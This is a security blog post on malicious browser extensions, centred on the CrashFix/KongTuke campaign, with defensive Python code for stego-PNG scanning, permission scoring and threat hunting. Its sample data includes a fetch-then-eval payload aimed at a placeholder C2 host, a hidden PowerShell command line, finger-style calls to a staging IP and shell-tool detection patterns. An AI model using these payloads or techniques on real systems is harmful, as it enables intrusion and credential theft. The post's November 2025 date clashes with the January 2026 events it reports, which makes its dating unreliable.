October Cybersecurity Insights

Browser extension malware: a rising tide of embedded threats


by | Nov 3, 2025 | Cybersecurity News

Malicious browser extensions have surged into a top-tier attack vector: 346 million users installed security-noteworthy extensions over a three-year period, and sophisticated campaigns now target corporate environments with multi-stage RATs, session hijacking, and supply-chain compromise. What was once a nuisance category (adware and search hijackers) has evolved into a full-spectrum threat that bypasses MFA, persists for years undetected, and delivers ransomware-grade payloads through the most trusted software distribution channel in the browser ecosystem: the extension stores themselves. The January 2026 CrashFix/KongTuke campaign exemplifies this evolution, combining a real browser crash with social engineering to deploy a previously undocumented Python RAT exclusively on domain-joined corporate machines. For IT administrators and security teams, the browser extension blind spot is now an active emergency.


The numbers paint an alarming picture

The most rigorous quantitative research on browser extension threats comes from a peer-reviewed Stanford/CISPA Helmholtz Center study presented at ACM ASIA CCS in July 2024. Researchers Sheryl Hsu, Manda Tran, and Aurore Fass analyzed the entire Chrome Web Store from July 2020 through February 2023 and found that 280 million users installed malware-containing extensions, 63.3 million installed policy-violating extensions, and 2.9 million installed extensions with known vulnerable code (the 346 million figure above is the sum of these three groups). Over 26,000 security-noteworthy extensions were identified out of roughly 125,000 total.

The persistence numbers are especially damning for store review processes. Malware-containing extensions survived an average of 380 days in the Chrome Web Store before removal. Vulnerable extensions persisted even longer, 1,248 days on average, and one extension (“TeleApp”) was available for 8.5 years before its malware was identified. User ratings proved essentially useless as safety indicators: the median rating for malware extensions was 4.997 out of 5.0, and 52% of malware extensions had no user reviews at all. A staggering 60% of all extensions had never received a single update, meaning known vulnerabilities go permanently unpatched.

Google’s own Chrome Security Team responded by noting that “less than 1% of all installs from the Chrome Web Store were found to include malware” in 2024, a figure that sounds reassuring until you multiply it by the store’s 250,000+ extensions and billions of installs. A University of Wisconsin-Madison study (ACM WWW 2024) found that 12.5% of Chrome extensions (over 17,300) hold permissions sufficient to extract sensitive data from every web page, and the researchers successfully uploaded a proof-of-concept data-stealing extension that passed the Chrome Web Store’s manual review process. A Georgia Tech study (USENIX Security 2024) identified over 3,000 extensions automatically collecting user-specific data, with 200+ directly exfiltrating sensitive information to external servers.

Enterprise exposure is particularly acute. LayerX’s 2025 Enterprise Browser Extension Security Report found that 99% of enterprise employees have at least one browser extension installed, 52% use more than ten, and 51% of enterprise extensions pose high security risks based on their permission profiles.


CrashFix and KongTuke: when your browser crash is the attack

The January 2026 CrashFix campaign, documented by Huntress researchers Anna Pham, Tanner Filip, and Dani Lopez, represents a significant evolution in browser extension tradecraft. The threat actor KongTuke (also tracked as 404 TDS, Chaya_002, LandUpdate808, and TAG-124) deployed a malicious Chrome extension called “NexShield - Advanced Web Guardian”, a near-identical clone of Raymond Hill’s uBlock Origin Lite with approximately 3,276 bytes of malicious code injected into the background script. The extension was distributed through the legitimate Chrome Web Store via malicious advertisements and was downloaded at least 5,000 times before removal. Microsoft Defender for Endpoint telemetry showed 133 detections globally between December 7, 2025 and January 16, 2026.

The attack chain is architecturally sophisticated. After installation, NexShield beacons to the typosquatted domain nexsnield[.]com (note the “n” in place of the “h”) with a unique UUID for tracking. It then uses Chrome’s Alarms API to delay execution by 60 minutes, deliberately weakening the victim’s mental association between the new extension and the browser problems that follow. After this delay, the extension triggers a browser denial of service: a makeBatch() function loops up to 1 billion times, opening a new chrome.runtime port connection on every iteration, until memory and CPU are exhausted and Chrome crashes outright.

This is where CrashFix diverges from traditional ClickFix attacks: the browser crash is real, not simulated. When the user force-quits and restarts the browser, a startup handler finds a stored timestamp and displays a fake “CrashFix” security warning claiming the browser “stopped abnormally.” The popup instructs users to “run a scan,” then presents fabricated “Security issues detected” results that direct them to open the Windows Run dialog and paste a command from the clipboard, where the extension has silently placed a malicious PowerShell command. If the user dismisses the popup without complying, a 10-minute timer triggers another crash, creating a self-sustaining infection loop that persists until the user either executes the payload or uninstalls the extension.

The payload delivery chain uses finger.exe as a Living-off-the-Land Binary (LOLBin), copied to %temp%\ct.exe to avoid detection, to fetch and pipe attacker commands from 199.217.98[.]108. Multiple layers of Base64 encoding, a ROT cipher, and XOR obfuscation lead to a victim-profiling stage that scans for 50+ analysis tools and VM indicators, then distinguishes domain-joined corporate machines (marker BCDA222) from standalone workgroup machines (marker ABCD111).

Corporate targets receive the VIP treatment: a previously undocumented Python-based RAT called ModeloRAT, delivered as a portable WinPython distribution from Dropbox. ModeloRAT implements RC4 encryption with random 16-byte keys, zlib-compressed C2 communication over HTTP port 80, adaptive beacon intervals (5 minutes normally, 150 milliseconds when active, 15 minutes during extended backoff), and persistence through registry Run keys with entries disguised as legitimate software names such as “Spotify47” or “Adobe2841.” Its reconnaissance capabilities include full system enumeration via PowerShell: OS version, processes, services, storage, ARP tables, network configuration, user privileges, and active TCP connections. KongTuke is associated with Rhysida ransomware, Interlock ransomware, TA866/Asylum Ambuscade, and SocGholish.

Annex Security (formerly Secure Annex, founded by researcher John Tuckner) published follow-up research titled “Promise Bomb crashes browsers to install malware,” documenting new CrashFix variants that use functional security extensions and push notification-based C2 to selectively crash browsers. These variants appear to represent an evolution beyond the original NexShield approach, employing extensions that genuinely function as security tools (increasing trust and reducing suspicion), using browser push notifications as a command-and-control channel (a technique similar to the Matrix Push C2 documented in late 2025), and implementing more selective targeting for browser crashes. The “Promise Bomb” name suggests a DoS technique based on cascading JavaScript Promise chains rather than the original chrome.runtime port flooding, potentially harder to detect via static analysis since Promises are standard JavaScript.


A decade of campaigns, from data harvesting to ransomware delivery

The threat landscape has progressed through distinct evolutionary phases. DataSpii (2019) established the template for extension-based mass surveillance, with 8 extensions collecting browsing data from up to 4.1 million users and selling it through “Nacho Analytics”, exposing data from the Pentagon, major banks, healthcare organizations, and defense contractors. The extensions employed dilatory tactics, waiting an average of 24 days before beginning data collection.

CacheFlow (active 2017–2020, reported February 2021 by Avast) introduced novel C2 techniques, hiding command-and-control traffic inside Cache-Control HTTP headers of analytics requests disguised as Google Analytics traffic across 28 extensions with 3 million+ installations. It profiled victims to avoid infecting web developers and deactivated when browser developer tools were opened.

ChromeLoader (2022–present) proved remarkably persistent, evolving through at least ten variants across Windows and macOS. Distributed via ISO files disguised as cracked games and pirated media, it uses PowerShell to inject malicious extensions and maintains persistence via scheduled tasks. By August 2023, Check Point listed it in the Global Threat Index as a prevalent worldwide malware family. The “Shampoo” variant deployed looping VBScript files through piracy site networks.

Rilide (April 2023–present) demonstrated that MV3 compliance doesn’t prevent sophistication, adapting to Manifest V3 restrictions while maintaining capabilities for screenshot capture, credential theft, cryptocurrency wallet manipulation, and unique 2FA bypass through forged dialog boxes. Sold on dark web forums for $5,000, IBM Trusteer documented 50,000+ infected user sessions as of January 2025.

The most consequential recent event was the December 2024 Chrome extension supply chain attack wave. Starting on Christmas Eve, attackers phished Cyberhaven’s developer via a fake Google policy violation email, obtained OAuth consent (bypassing MFA and even Google Advanced Protection), and pushed a malicious extension update to 400,000 users within hours. The campaign ultimately compromised 35+ extensions affecting 2.6+ million users, with infrastructure dating back to at least December 2023. The attacker’s OAuth application, named “Privacy Policy Extension,” requested permission to “see, edit, update, or publish your Chrome Web Store extensions.” MFA cannot protect against this flow because it is not an authentication request: the developer was already signed in, and MFA says nothing about what an authenticated user then chooses to consent to.

More recent campaigns have grown even bolder:

  • ShadyPanda (discovered December 2025): A seven-year sleeper campaign affecting 4.3 million Chrome and Edge users, where legitimate extensions accumulated downloads for years before receiving malicious updates with backdoors checking C2 servers hourly
  • GitLab’s February 2025 discovery: 16 trojanized extensions affecting 3.2 million users, acquired through developer account purchase or compromise, with infrastructure overlapping the December 2024 supply chain attack
  • The “unknow.com” network (April 2025, discovered by John Tuckner): 57–58 extensions with 6 million total installs, 10 of which carried Google’s “Featured” badge despite being unlisted — heavily obfuscated with cookie retrieval, authorization header harvesting, and remote configuration capabilities
  • DarkSpectre/GhostPoster (2020–2026): Over 100 extensions across Chrome, Edge, and Firefox affecting 8.8 million users, using steganographic payloads hidden inside PNG icon files, attributed to a Chinese threat actor based on Alibaba Cloud infrastructure and Chinese-language code strings

How extension malware operates under the hood

Understanding the technical mechanisms is essential for detection and defense. Browser extension malware exploits several architectural features of the extension model.

Permission abuse remains the primary attack enabler. The most dangerous permissions include <all_urls> (content script injection on every website), cookies (the chrome.cookies API can both read and inject session tokens), webRequest/webRequestBlocking (MV2; full HTTP traffic interception), tabs (enumerates all open URLs), and management (discovers installed security extensions for evasion). A Socket.dev investigation in 2025 documented an enterprise extension using chrome.cookies.set() for bidirectional cookie injection: it stole session tokens from Workday, NetSuite, and SuccessFactors every 60 seconds while injecting them into attacker-controlled browsers. The same extension blocked access to 44 administrative pages within Workday to hinder incident response.

Content script injection provides DOM-level access that is unchanged between MV2 and MV3. Content scripts share the DOM with the host page, enabling form field scraping (including password fields), localStorage/sessionStorage access, phishing overlay injection, and token harvesting. At DEF CON 33 (August 2025), researcher Marek Tóth demonstrated “DOM-Based Extension Clickjacking”, manipulating the UI elements that legitimate extensions (such as password managers) inject into the DOM to steal credentials with a single click.

Background service workers (MV3) and background pages (MV2) handle C2 communication, persistence, and payload orchestration. Although MV3 service workers terminate after 10–30 seconds of inactivity, attackers circumvent this trivially using chrome.alarms for scheduled wake-ups. CrashFix uses 10-minute alarm intervals; the “Stanley” Malware-as-a-Service platform polls C2 every 10 seconds with backup domain rotation.

Obfuscation techniques have grown sophisticated despite the Chrome Web Store’s 2019 ban on obfuscated code. Active techniques include steganographic encoding (malicious JavaScript hidden inside PNG image files and extracted after a byte delimiter), multi-layer string concatenation to hide eval() calls, XOR-encrypted downloaded payloads, staged execution chains with multiple decode layers, and, most critically, configuration-driven architecture, where the extension code itself appears clean while server-side JSON configuration tells already-bundled code what to steal, when, and from where. This last technique is nearly impossible to catch during store review, because nothing in the reviewed package changes when the server-side configuration does.
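To make the steganographic-PNG technique concrete, here is an added example (editor-supplied, not code from any of the campaigns, vendors or researchers named on this page) of the check a reviewer or scanner can run over an extension’s bundled icons: parse the PNG chunk list, verify each chunk CRC, and report anything stored after the IEND chunk or in private chunks. The 1x1 PNG, the delimiter and the JavaScript payload are constructed for the example; extract_after_delimiter shows the trivial recovery step a loader performs, which is why the trailing-data check is the useful one.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Script fragments that have no business trailing an icon file (heuristic chosen for this example).
JS_TOKENS = (b"eval(", b"function", b"fetch(", b"chrome.", b"atob(", b"=>", b"XMLHttpRequest")


def _chunk(ctype: bytes, body: bytes) -> bytes:
    """Serialise one PNG chunk: 4-byte length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def make_png() -> bytes:
    """Constructed 1x1 RGB PNG used as sample input (not a real extension icon)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # width, height, depth, RGB, no interlace
    idat = zlib.compress(b"\x00\xff\x00\x00")             # filter byte + one red pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


def png_chunks(data: bytes):
    """Walk the chunk list; return ([(type, body, crc_ok)], offset just past IEND)."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos, chunks = len(PNG_SIG), []
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length
        if end > len(data):            # truncated chunk: stop rather than guess
            break
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:end])
        crc_ok = (zlib.crc32(ctype + body) & 0xFFFFFFFF) == crc
        chunks.append((ctype.decode("latin-1"), body, crc_ok))
        pos = end
        if ctype == b"IEND":           # decoders stop here; anything after is dead weight
            break
    return chunks, pos


def scan_png(data: bytes) -> dict:
    """Report data after IEND, CRC mismatches and private chunks, the places a payload hides."""
    chunks, end = png_chunks(data)
    types = [t for t, _, _ in chunks]
    reasons = []
    trailing = data[end:] if types and types[-1] == "IEND" else b""
    if trailing:
        reasons.append(f"{len(trailing)} bytes after IEND")
    if not all(ok for _, _, ok in chunks):
        reasons.append("chunk CRC mismatch")
    private = [t for t in types if t[1].islower()]   # lowercase second letter = private chunk
    if private:
        reasons.append(f"private chunks: {private}")
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in trailing)
    tokens = [t.decode() for t in JS_TOKENS if t in trailing]
    if tokens:
        reasons.append(f"script tokens in trailing data: {tokens}")
    return {
        "chunks": types,
        "trailing_bytes": len(trailing),
        "trailing_text_ratio": round(printable / len(trailing), 2) if trailing else 0.0,
        "js_tokens": tokens,
        "suspicious": bool(reasons),
        "reasons": reasons,
    }


def extract_after_delimiter(data: bytes, delim: bytes) -> bytes:
    """What a loader does: everything after a fixed marker is the payload."""
    i = data.find(delim)
    return data[i + len(delim):] if i >= 0 else b""


# Constructed samples: a clean icon and the same icon with a script appended after a marker.
DELIM = b"<<PAYLOAD>>"
PAYLOAD = b"(function(){fetch('https://c2.invalid/cfg').then(r=>r.text()).then(eval)})();"
CLEAN_PNG = make_png()
STEGO_PNG = CLEAN_PNG + DELIM + PAYLOAD

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN_PNG), ("stego", STEGO_PNG)):
        print(label, scan_png(blob))
```

Any byte after IEND is abnormal for an icon regardless of what it contains, so the scanner flags trailing data on its own and only uses the printable ratio and token list to tell the analyst what was found; an attacker who XORs the appended blob defeats the token check but not the trailing-data check.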

Data exfiltration methods range from direct HTTPS POST to C2 servers (the Cyberhaven breach exfiltrated ~859 MB from one customer), WebSocket connections for real-time streaming, DNS-based exfiltration with data encoded in subdomain labels, and Telegram channel exfiltration (used by Rilide). The December 2024 supply chain attack targeted Facebook Ads/Business accounts and ChatGPT credentials via dynamically adjustable configuration files.


Manifest V3 raises the bar but doesn’t close the window

Google’s Manifest V3 migration, with MV2 fully deprecated by June 2025, introduces meaningful security improvements: non-persistent service workers replace long lived background pages, declarativeNetRequest (DNR) replaces the blocking webRequest API for consumer extensions, remote code execution is banned (all code must be bundled), and stricter Content Security Policy restrictions prevent inline scripts and eval().

However, academic research demonstrates clear limits. A 2024 study converting 517 confirmed malicious MV2 extensions to MV3 found that while 87.8% of the malicious APIs were removed or deprecated, 56% of the malicious extensions regained harmful capabilities after adaptation, using techniques such as web-accessible resources for third-party script injection. A January–May 2025 study successfully built and submitted MV3 credential-harvesting extensions to the Chrome Web Store, demonstrating that content-script DOM access, the foundation of most credential theft, is completely unchanged in MV3.

Attackers have adapted through five primary mechanisms: content script attacks (DOM access unchanged), configuration-driven C2 (fetching JSON instructions rather than executable code), steganographic payloads (code hidden in bundled images, technically not “remote code”), supply chain compromise (pushing malicious updates through already-approved extensions), and chrome.alarms-based persistence for service worker wake-ups. Firefox’s divergent MV3 implementation, which preserves the blocking webRequest API, creates additional attack surface.

Key CVEs in the extension security space include CVE-2024-6778 (high severity, race condition allowing sandbox escape via Chrome DevTools/extension interaction), CVE-2025-0451 (medium, UI spoofing via crafted extensions in Chrome prior to 133.0.6943.53), and CVE-2024-0981 (reflected XSS in the Okta Browser Plugin affecting versions 6.5.0 through 6.31.0 across all major browsers).


Extension stores: necessary gatekeepers with structural blind spots

Chrome Web Store employs a dual-layer system of automated ML/static analysis scanning plus manual review for flagged submissions, with post-publication monitoring. Firefox AMO requires human review of all listed add-ons and mandates source code submission for transpiled/minified extensions, a meaningfully higher bar. Edge Add-ons runs virus/malware scanning plus human content review, with certification taking up to 7 business days.

Yet structural gaps persist across all stores. Delayed activation (DarkSpectre waited 3 days; DataSpii waited 24) evades review testing windows. Probabilistic activation (triggering malicious behavior on only ~10% of page loads) reduces detection probability during automated analysis. Server-side configuration changes alter extension behavior without triggering re-review, the most dangerous gap of all. Supply chain attacks bypass review entirely because compromised developer accounts push malicious updates to already-approved, high-reputation extensions. And Malware-as-a-Service platforms now explicitly advertise Chrome Web Store publication as a feature: the “Stanley” toolkit ($2,000–$6,000) guarantees CWS publishing and review clearance.

The Stanford study’s finding that only 64 malware extensions (1% of total malware) accounted for 83% of all malicious installations suggests that automated detection catches most small-scale abuse but consistently fails on the most impactful, most sophisticated campaigns, exactly the ones that matter most.

Review feature               Chrome Web Store            Firefox AMO                   Edge Add-ons
Automated scanning           ML + static analysis        Sandbox + ML (2025+)          Virus/malware scanning
Human review                 Flagged submissions only    All listed add-ons            All submissions
Source code required         No                          Yes (minified/transpiled)     No
Remote code banned           Yes (MV3)                   Yes (policy)                  Yes (MV3)
Post-publication monitoring  Periodic re-review          Blocklisting system           Limited

Practical defensive measures for security teams

The convergence of these trends demands active defense rather than passive trust in store review processes. For IT administrators and security teams at organizations like those CyberMKE advises, several measures are immediately actionable.

Extension allowlisting via Group Policy is the single highest-impact control, restricting which extensions can be installed across managed Chrome, Edge, and Firefox deployments (for Chrome and Edge, set ExtensionInstallBlocklist to * and enumerate approved IDs in ExtensionInstallAllowlist). Organizations should inventory all currently installed extensions using endpoint management tools, assess each against its permission profile, and maintain an allowlist of approved extensions with periodic re-evaluation.
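As an added, runnable illustration of the inventory-and-scoring step (editor-supplied example code, not a CyberMKE tool and not from any of the sources cited), the Python script below loads extension manifests, scores them against the permission list from the “Permission abuse” discussion above (<all_urls>, cookies, webRequest/webRequestBlocking, tabs, management), and ranks unapproved extensions first. The weights, the risk thresholds and the three sample manifests with placeholder IDs are constructed for the example; the on-disk layout assumed by load_chrome_manifests (Extensions/<id>/<version>/manifest.json under a Chrome or Edge profile) is the real one.

```python
import json
import os

BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# Weights and thresholds are this example's own heuristic, not a store or vendor scale.
PERMISSION_WEIGHTS = {
    "debugger": 5, "cookies": 4, "webRequestBlocking": 4, "nativeMessaging": 4,
    "webRequest": 3, "management": 3, "tabs": 2, "scripting": 2, "history": 2,
    "clipboardRead": 2, "webNavigation": 1, "declarativeNetRequest": 1,
}


def _is_host_pattern(p: str) -> bool:
    # MV2 mixes host match patterns into "permissions"; MV3 keeps them in host_permissions.
    return p in BROAD_HOST_PATTERNS or "://" in p or p.startswith("*")


def score_manifest(manifest: dict):
    """Return (score, findings) for one manifest.json, MV2 or MV3."""
    api, hosts = set(), set()
    for p in manifest.get("permissions", []) + manifest.get("optional_permissions", []):
        (hosts if _is_host_pattern(p) else api).add(p)
    hosts.update(manifest.get("host_permissions", []))
    hosts.update(manifest.get("optional_host_permissions", []))
    for cs in manifest.get("content_scripts", []):       # content scripts share the page DOM
        hosts.update(cs.get("matches", []))
    score, findings = 0, []
    broad = bool(hosts & BROAD_HOST_PATTERNS)
    if broad:
        score += 4
        findings.append("DOM/host access on every site")
    elif hosts:
        score += 1
        findings.append("host access: " + ", ".join(sorted(hosts)))
    for p in sorted(api):
        if p in PERMISSION_WEIGHTS:
            score += PERMISSION_WEIGHTS[p]
            findings.append(f"permission {p}")
    if "cookies" in api and broad:                        # chrome.cookies get/set on any domain
        score += 3
        findings.append("cookies + all sites: can read and inject any session token")
    if manifest.get("manifest_version", 2) == 2 and "webRequestBlocking" in api:
        findings.append("MV2 blocking webRequest: can rewrite every request and response")
    return score, findings


def risk_level(score: int) -> str:
    return "high" if score >= 8 else "medium" if score >= 4 else "low"


def audit_extensions(installed: dict, allowlist: set) -> list:
    """installed maps extension ID -> manifest dict; unapproved, highest-scoring first."""
    rows = []
    for ext_id, m in installed.items():
        score, findings = score_manifest(m)
        rows.append({"id": ext_id, "name": m.get("name", "?"), "version": m.get("version", "?"),
                     "score": score, "risk": risk_level(score),
                     "allowlisted": ext_id in allowlist, "findings": findings})
    return sorted(rows, key=lambda r: (r["allowlisted"], -r["score"]))


def load_chrome_manifests(profile_dir: str) -> dict:
    """Read Extensions/<id>/<version>/manifest.json below a Chrome or Edge profile directory
    (e.g. %LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default). Names of the form
    __MSG_xxx__ are localized and would need a _locales lookup to resolve."""
    found, root = {}, os.path.join(profile_dir, "Extensions")
    if not os.path.isdir(root):
        return found
    for ext_id in os.listdir(root):
        ext_dir = os.path.join(root, ext_id)
        if not os.path.isdir(ext_dir):
            continue
        for version in sorted(os.listdir(ext_dir)):       # last version directory wins
            path = os.path.join(ext_dir, version, "manifest.json")
            if os.path.isfile(path):
                with open(path, encoding="utf-8") as fh:
                    found[ext_id] = json.load(fh)
    return found


# Constructed sample manifests with placeholder IDs (not real extensions).
ID_CLONE, ID_NOTES, ID_HR = "a" * 32, "b" * 32, "c" * 32
SAMPLE_INSTALLED = {
    ID_CLONE: {"manifest_version": 2, "name": "Web Guardian Pro", "version": "1.4",
               "permissions": ["<all_urls>", "cookies", "webRequest", "webRequestBlocking",
                               "tabs", "management", "storage"]},
    ID_NOTES: {"manifest_version": 3, "name": "Quick Notes", "version": "2.0",
               "permissions": ["storage", "activeTab"]},
    ID_HR: {"manifest_version": 3, "name": "HR Portal Helper", "version": "0.9",
            "permissions": ["scripting", "cookies"],
            "host_permissions": ["https://*.hr-portal.example/*"]},
}
ALLOWLIST = {ID_NOTES}

if __name__ == "__main__":
    for row in audit_extensions(SAMPLE_INSTALLED, ALLOWLIST):
        flag = "approved" if row["allowlisted"] else "NOT ALLOWLISTED"
        print(f"{row['risk']:<6} {row['score']:>3}  {row['name']} ({row['id'][:8]}...) [{flag}]")
        for f in row["findings"]:
            print("       -", f)
```

Run it against a real profile with audit_extensions(load_chrome_manifests(profile_dir), allowlist). The score is deliberately additive so that the combination the page singles out (cookies together with all-site host access) outranks either permission alone; an ad-blocker clone with <all_urls>, cookies, webRequestBlocking, tabs and management lands at the top of the list even before any behavioral evidence exists.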

Monitor for LOLBin abuse: particularly finger.exe execution from temporary directories (or any binary in a temp directory invoked with finger-style user@host arguments, since the campaign renames the client), PowerShell spawning from browser processes, and registry Run key entries mimicking legitimate software names. Note that the CrashFix command is pasted into the Run dialog, so the resulting PowerShell process will typically have explorer.exe rather than the browser as its parent; hunt on the command line and on the finger chain, not only on the parent process. The campaign’s renamed finger.exe and Run key entries like “Spotify47” and “MonitoringService” provide concrete detection signatures.
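The hunting logic implied by those three signals, written as an added example (editor-supplied, not Huntress or Microsoft detection content) in Python over a handful of constructed EDR-style events. The vendor-name-plus-digits pattern for Run key names, the temp-directory and python-outside-Program-Files checks, and the finger-style user@IP argument match are heuristics chosen for this example; the 199.217.98[.]108 address in the sample is the page’s own IOC, and every other host, path and timestamp is made up.

```python
import re

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
TEMP_DIR_RE = re.compile(r"\\(?:temp|tmp)\\", re.IGNORECASE)
# finger client syntax is [user]@host; a bare IPv4 host is what the CrashFix stage used
FINGER_ARGS_RE = re.compile(r"(?:^|\s)\S*@\d{1,3}(?:\.\d{1,3}){3}(?:\s|$)")
# heuristic (assumption): vendor-looking name with a numeric suffix, e.g. Spotify47, Adobe2841
BRAND_SUFFIX_RE = re.compile(
    r"^(?:spotify|adobe|google|microsoft|java|dropbox|onedrive|nvidia|intel)\d+$", re.IGNORECASE)
PYTHON_RE = re.compile(r"\\pythonw?\.exe\b", re.IGNORECASE)
PROGRAM_FILES_RE = re.compile(r'^"?[A-Z]:\\Program Files(?: \(x86\))?\\', re.IGNORECASE)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _alert(rule: str, ev: dict, detail: str) -> dict:
    return {"rule": rule, "ts": ev["ts"], "host": ev["host"], "detail": detail}


def check_process(ev: dict) -> list:
    """Process-creation event: image, parent_image, cmdline."""
    alerts = []
    image, parent = _basename(ev["image"]), _basename(ev["parent_image"])
    cmd = ev.get("cmdline", "")
    finger_style = bool(FINGER_ARGS_RE.search(cmd))
    if image == "finger.exe" and finger_style:
        alerts.append(_alert("finger_lolbin_network", ev, f"finger.exe contacting a raw IP: {cmd}"))
    if image != "finger.exe" and finger_style and TEMP_DIR_RE.search(ev["image"]):
        # the renamed copy (%temp%\ct.exe) still takes finger's user@host argument
        alerts.append(_alert("renamed_finger_from_temp", ev, f"{image} in temp dir with finger-style args: {cmd}"))
    if parent in BROWSERS and image in SHELLS:
        alerts.append(_alert("shell_spawned_by_browser", ev, f"{parent} -> {image}: {cmd}"))
    return alerts


def check_runkey(ev: dict) -> list:
    """Registry value set under a Run key: value_name, value_data."""
    name, data = ev["value_name"], ev["value_data"]
    reasons = []
    if BRAND_SUFFIX_RE.match(name):
        reasons.append("vendor-like name with numeric suffix")
    if TEMP_DIR_RE.search(data):
        reasons.append("command lives in a temp directory")
    if PYTHON_RE.search(data) and not PROGRAM_FILES_RE.match(data):
        reasons.append("python interpreter outside Program Files")   # portable WinPython drop
    if reasons:
        return [_alert("suspicious_run_key", ev, f"{name} = {data} ({'; '.join(reasons)})")]
    return []


def scan(events: list) -> list:
    alerts = []
    for ev in events:
        if ev["type"] == "process":
            alerts.extend(check_process(ev))
        elif ev["type"] == "registry":
            alerts.extend(check_runkey(ev))
    return alerts


RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
# Constructed sample telemetry (hosts, users, paths and timestamps are fictitious).
SAMPLE_EVENTS = [
    {"type": "process", "ts": "2026-01-12T09:14:03Z", "host": "WS-0412",
     "parent_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -ep bypass -c "iex (gc $env:TEMP\\s.ps1 -Raw)"'},
    {"type": "process", "ts": "2026-01-12T09:14:05Z", "host": "WS-0412",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\alice\AppData\Local\Temp\ct.exe",
     "cmdline": "ct.exe alice@199.217.98.108"},
    {"type": "process", "ts": "2026-01-12T09:20:11Z", "host": "WS-0412",
     "parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\alice\Desktop\todo.txt"},
    {"type": "process", "ts": "2026-01-12T10:02:40Z", "host": "WS-0199",
     "parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\finger.exe",
     "cmdline": "finger bob@203.0.113.9"},
    {"type": "registry", "ts": "2026-01-12T09:15:30Z", "host": "WS-0412", "key": RUN_KEY,
     "value_name": "Spotify47",
     "value_data": r"C:\Users\alice\AppData\Local\Temp\WPy64\python.exe C:\Users\alice\AppData\Roaming\m.py"},
    {"type": "registry", "ts": "2026-01-12T09:16:02Z", "host": "WS-0412", "key": RUN_KEY,
     "value_name": "OneDrive",
     "value_data": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
    {"type": "registry", "ts": "2026-01-12T09:16:45Z", "host": "WS-0412", "key": RUN_KEY,
     "value_name": "MonitoringService",
     "value_data": r"C:\Users\alice\AppData\Local\Temp\WPy64\pythonw.exe C:\Users\alice\AppData\Roaming\svc.py"},
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"{a['ts']} {a['host']} [{a['rule']}] {a['detail']}")
```

The renamed-binary rule is the one that matters for this campaign: finger.exe itself never appears in process telemetry once it has been copied to %temp%\ct.exe, but the copy still has to be called with finger’s user@host argument to reach the staging IP, and that argument shape is rare enough on a workstation to be a usable signal on its own.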

Implement browser extension telemetry through EDR platforms. Microsoft Defender for Endpoint KQL can hunt for a specific extension ID in its install path (DeviceFileEvents | where FolderPath has "cpcdkmjddocikjdkbbeiaafnpdbdafmi"), for C2 communication patterns, and for LOLBin command chains. Google’s Enterprise Web Store (announced October 2024) provides curated extension management with risk scoring and SecOps integration.

Educate users about social engineering via extensions: specifically that no legitimate browser error will ever instruct them to open the Run dialog and paste a command. The CrashFix self-sustaining crash loop is designed to exploit user frustration, and awareness is the primary defense against this vector.

Monitor OAuth consent grants to Chrome Web Store developer accounts, especially since the December 2024 wave demonstrated that MFA provides zero protection against authorization-based phishing. Developer teams maintaining published extensions should treat their CWS accounts as high-value targets with corresponding access controls.


Conclusion

Browser extensions occupy a uniquely dangerous position in the security landscape: they execute with elevated privileges inside the most sensitive application most users interact with daily, they auto-update silently, they are distributed through stores that structurally cannot catch sophisticated threats, and they are almost entirely invisible to traditional endpoint security tools. The progression from DataSpii’s passive data harvesting in 2019 to CrashFix’s deliberate browser DoS and ModeloRAT deployment in 2026 traces a clear trajectory toward extensions as a first-class malware delivery and persistence mechanism, one that threat actors associated with ransomware operations are now actively exploiting against corporate targets. The December 2024 supply chain attack wave proved that even security-conscious organizations with MFA and Google Advanced Protection can be compromised through extension developer OAuth phishing at scale. Manifest V3 raises the floor but does not close the architectural gaps that make this attack surface so attractive. For security teams, browser extensions can no longer be treated as a user convenience issue; they are an endpoint security issue that demands the same rigor applied to any other software supply chain.


Appendix: Key IOCs from CrashFix/KongTuke (January 2026)

Indicator               Value
Extension ID            cpcdkmjddocikjdkbbeiaafnpdbdafmi
Extension CRX SHA256    c46af9ae6ab0e7567573dbc950a8ffbe30ea848fac90cd15860045fe7640199c
C2 domain               nexsnield[.]com
Payload delivery IP     199.217.98[.]108
ModeloRAT C2 IPs        170.168.103[.]208, 158.247.252[.]178
Developer email         [email protected]
LOLBin                  finger.exe, copied to %temp%\ct.exe
Registry persistence    HKCU\Software\Microsoft\Windows\CurrentVersion\Run -> “MonitoringService”
Domain-joined marker    BCDA222
Workgroup marker        ABCD111
DGA TLD                 .top (weekly rotation)

Appendix: Source retrieval notes

  • Huntress CrashFix/KongTuke blog (published January 16, 2026): Full content retrieved and summarized. Primary technical source for CrashFix infection chain, ModeloRAT architecture, and IOCs.
